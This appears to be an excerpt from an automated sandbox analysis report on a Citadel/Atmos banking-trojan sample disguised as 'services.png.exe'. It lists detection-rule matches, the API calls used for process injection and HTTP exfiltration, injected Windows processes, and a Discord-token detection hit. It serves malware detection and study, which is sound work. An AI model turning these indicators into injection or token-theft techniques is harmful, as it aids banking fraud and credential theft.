                        Source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00426277 WriteProcessMemory,GetCurrentProcess,WriteProcessMemory,NtCreateThread,0_2_00426277
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00433EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,0_2_00433EDE
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0041115F NtQueryKey,NtQueryKey,NtQueryKey,0_2_0041115F
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0040A328 NtQueryInformationProcess,CloseHandle,NtCreateThread,0_2_0040A328
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004263F3 NtCreateUserProcess,NtCreateThread,LdrLoadDll,ExitProcess,GetFileAttributesExW,CreateProcessAsUserA,CreateProcessAsUserW,HttpOpenRequestW,HttpOpenRequestA,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,HttpEndRequestA,HttpEndRequestW,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetSetFilePointer,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,RegQueryValueExA,RegQueryValueExW,GetMessageW,PeekMessageW,GetClipboardData,PFXImportCertStore,0_2_004263F3
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0040A437 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,0_2_0040A437
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02836277 WriteProcessMemory,GetCurrentProcess,WriteProcessMemory,NtCreateThread,0_2_02836277
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_028363F3 NtCreateThread,ExitProcess,GetFileAttributesExW,CreateProcessAsUserA,CreateProcessAsUserW,HttpOpenRequestW,HttpOpenRequestA,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,HttpEndRequestA,HttpEndRequestW,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetSetFilePointer,InternetQueryDataAvailable,HttpQueryInfoA,#3,#19,WSASend,RegQueryValueExA,RegQueryValueExW,GetMessageW,PeekMessageW,GetClipboardData,PFXImportCertStore,0_2_028363F3
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02843EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,0_2_02843EDE
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0281A437 NtCreateUserProcess,GetProcessId,Wow64GetThreadContext,Wow64SetThreadContext,VirtualFreeEx,CloseHandle,0_2_0281A437
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0281A328 NtQueryInformationProcess,CloseHandle,NtCreateThread,0_2_0281A328
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0282115F NtQueryKey,NtQueryKey,NtQueryKey,0_2_0282115F
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00426277 WriteProcessMemory,GetCurrentProcess,WriteProcessMemory,NtCreateThread,1_2_00426277
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00433EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,1_2_00433EDE
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0041115F NtQueryKey,NtQueryKey,NtQueryKey,1_2_0041115F
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0040A328 NtQueryInformationProcess,CloseHandle,NtCreateThread,1_2_0040A328
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_004263F3 NtCreateUserProcess,NtCreateThread,LdrLoadDll,ExitProcess,GetFileAttributesExW,CreateProcessAsUserA,CreateProcessAsUserW,HttpOpenRequestW,HttpOpenRequestA,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,HttpEndRequestA,HttpEndRequestW,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetSetFilePointer,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,RegQueryValueExA,RegQueryValueExW,GetMessageW,PeekMessageW,GetClipboardData,PFXImportCertStore,1_2_004263F3
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0040A437 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,1_2_0040A437
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438B28C8 NtEnumerateValueKey,NtEnumerateValueKey,2_2_000001CD438B28C8
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4E28C8 NtEnumerateValueKey,NtEnumerateValueKey,5_2_000001F28B4E28C8
                        Source: C:\Windows\explorer.exeCode function: 6_2_0907202C NtQuerySystemInformation,StrCmpNIW,6_2_0907202C
                        Source: C:\Windows\explorer.exeCode function: 6_2_090728C8 NtEnumerateValueKey,NtEnumerateValueKey,6_2_090728C8
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E81828C8 NtEnumerateValueKey,NtEnumerateValueKey,19_2_000001F6E81828C8
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0040A999 CreateProcessAsUserA,0_2_0040A999
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00420297 CreateThread,CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,IsWellKnownSid,Sleep,GetFileAttributesExW,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_00420297
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00420003 ExitWindowsEx,0_2_00420003
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00417FF3 InitiateSystemShutdownExW,ExitWindowsEx,0_2_00417FF3
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02830297 CreateThread,CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,IsWellKnownSid,Sleep,GetFileAttributesExW,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_02830297
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02830003 ExitWindowsEx,0_2_02830003
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02827FF3 InitiateSystemShutdownExW,ExitWindowsEx,0_2_02827FF3
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00420297 CreateThread,CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,IsWellKnownSid,Sleep,GetFileAttributesExW,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,1_2_00420297
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00420003 ExitWindowsEx,1_2_00420003
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00417FF3 InitiateSystemShutdownExW,ExitWindowsEx,1_2_00417FF3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeRegistry key value created / modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Privacy
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004332590_2_00433259
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00435A230_2_00435A23
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0042946B0_2_0042946B
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0043CD430_2_0043CD43
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004275AD0_2_004275AD
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0043C6570_2_0043C657
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004267720_2_00426772
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02845A230_2_02845A23
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_028432590_2_02843259
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0284C6570_2_0284C657
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_028367720_2_02836772
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0283946B0_2_0283946B
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_028375AD0_2_028375AD
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0284CD430_2_0284CD43
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0043C6571_2_0043C657
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_004332591_2_00433259
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00435A231_2_00435A23
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0042946B1_2_0042946B
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_0043CD431_2_0043CD43
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_004275AD1_2_004275AD
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_004267721_2_00426772
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD40E4D0E02_2_000001CD40E4D0E0
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD40E538A82_2_000001CD40E538A8
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD40E41F2C2_2_000001CD40E41F2C
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438B2B2C2_2_000001CD438B2B2C
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438BDCE02_2_000001CD438BDCE0
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438C44A82_2_000001CD438C44A8
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438E1F2C2_2_000001CD438E1F2C
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438ED0E02_2_000001CD438ED0E0
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438F38A82_2_000001CD438F38A8
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A6531F2C3_2_00000151A6531F2C
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A65438A83_2_00000151A65438A8
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A653D0E03_2_00000151A653D0E0
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A6562B2C3_2_00000151A6562B2C
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A65744A83_2_00000151A65744A8
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A656DCE03_2_00000151A656DCE0
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29CF2B2C4_2_0000019E29CF2B2C
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29D0AEC44_2_0000019E29D0AEC4
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29CFDCE04_2_0000019E29CFDCE0
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29D044A84_2_0000019E29D044A8
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4B1F2C5_2_000001F28B4B1F2C
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4BD0E05_2_000001F28B4BD0E0
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4C38A85_2_000001F28B4C38A8
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4E2B2C5_2_000001F28B4E2B2C
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4EDCE05_2_000001F28B4EDCE0
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4F44A85_2_000001F28B4F44A8
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B511F2C5_2_000001F28B511F2C
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B51D0E05_2_000001F28B51D0E0
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B5238A85_2_000001F28B5238A8
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B542B2C5_2_000001F28B542B2C
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B54DCE05_2_000001F28B54DCE0
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B5544A85_2_000001F28B5544A8
                        Source: C:\Windows\explorer.exeCode function: 6_2_08D3D0E06_2_08D3D0E0
                        Source: C:\Windows\explorer.exeCode function: 6_2_08D438A86_2_08D438A8
                        Source: C:\Windows\explorer.exeCode function: 6_2_08D31F2C6_2_08D31F2C
                        Source: C:\Windows\explorer.exeCode function: 6_2_090844A86_2_090844A8
                        Source: C:\Windows\explorer.exeCode function: 6_2_0907DCE06_2_0907DCE0
                        Source: C:\Windows\explorer.exeCode function: 6_2_09072B2C6_2_09072B2C
                        Source: C:\Windows\explorer.exeCode function: 6_2_093D38A86_2_093D38A8
                        Source: C:\Windows\explorer.exeCode function: 6_2_093CD0E06_2_093CD0E0
                        Source: C:\Windows\explorer.exeCode function: 6_2_093C1F2C6_2_093C1F2C
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D5931F2C7_2_00000221D5931F2C
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D59438A87_2_00000221D59438A8
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D593D0E07_2_00000221D593D0E0
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D5962B2C7_2_00000221D5962B2C
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D59744A87_2_00000221D59744A8
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D596DCE07_2_00000221D596DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 9_2_000001ECFC69DCE09_2_000001ECFC69DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 9_2_000001ECFC6A44A89_2_000001ECFC6A44A8
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 9_2_000001ECFC692B2C9_2_000001ECFC692B2C
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787544A814_2_000001D1787544A8
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D17874DCE014_2_000001D17874DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D178742B2C14_2_000001D178742B2C
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787B44A814_2_000001D1787B44A8
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787ADCE014_2_000001D1787ADCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787A2B2C14_2_000001D1787A2B2C
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B612144A817_2_0000023B612144A8
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B61202B2C17_2_0000023B61202B2C
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6120DCE017_2_0000023B6120DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B612744A817_2_0000023B612744A8
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B61262B2C17_2_0000023B61262B2C
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6126DCE017_2_0000023B6126DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7B1F2C18_2_000002135E7B1F2C
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7C38A818_2_000002135E7C38A8
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7BD0E018_2_000002135E7BD0E0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7E2B2C18_2_000002135E7E2B2C
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7F44A818_2_000002135E7F44A8
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7EDCE018_2_000002135E7EDCE0
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E81638A819_2_000001F6E81638A8
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E815D0E019_2_000001F6E815D0E0
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E8151F2C19_2_000001F6E8151F2C
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E81944A819_2_000001F6E81944A8
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E818DCE019_2_000001F6E818DCE0
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E8182B2C19_2_000001F6E8182B2C
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E84F38A819_2_000001F6E84F38A8
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E84ED0E019_2_000001F6E84ED0E0
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E84E1F2C19_2_000001F6E84E1F2C
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\smbhost[1].exe F2B0F9D4F4109891D7A92F3C9E22C0FB748D36BF564EEBF74A0055056E307B45
                        Source: C:\Users\user\Desktop\services.png.exeProcess token adjusted: SecurityJump to behavior
                        Source: tmp3809.tmp.0.drStatic PE information: Resource name: RT_MESSAGETABLE type: PDP-11 separate I&D executable not stripped
                        Source: tmp45F4.tmp.1.drStatic PE information: Resource name: RT_MESSAGETABLE type: PDP-11 separate I&D executable not stripped
                        Source: tmp3809.tmp.0.drStatic PE information: No import functions for PE file found
                        Source: tmp45F4.tmp.1.drStatic PE information: No import functions for PE file found
                        Source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs services.png.exe
                        Source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs services.png.exe
                        Source: services.png.exe, 00000000.00000002.2171781778.0000000002BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs services.png.exe
                        Source: services.png.exe, 00000000.00000003.1699808293.000000000223F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedllhost.exej% vs services.png.exe
                        Source: services.png.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: services.png.exe, type: SAMPLEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: dump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                        Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
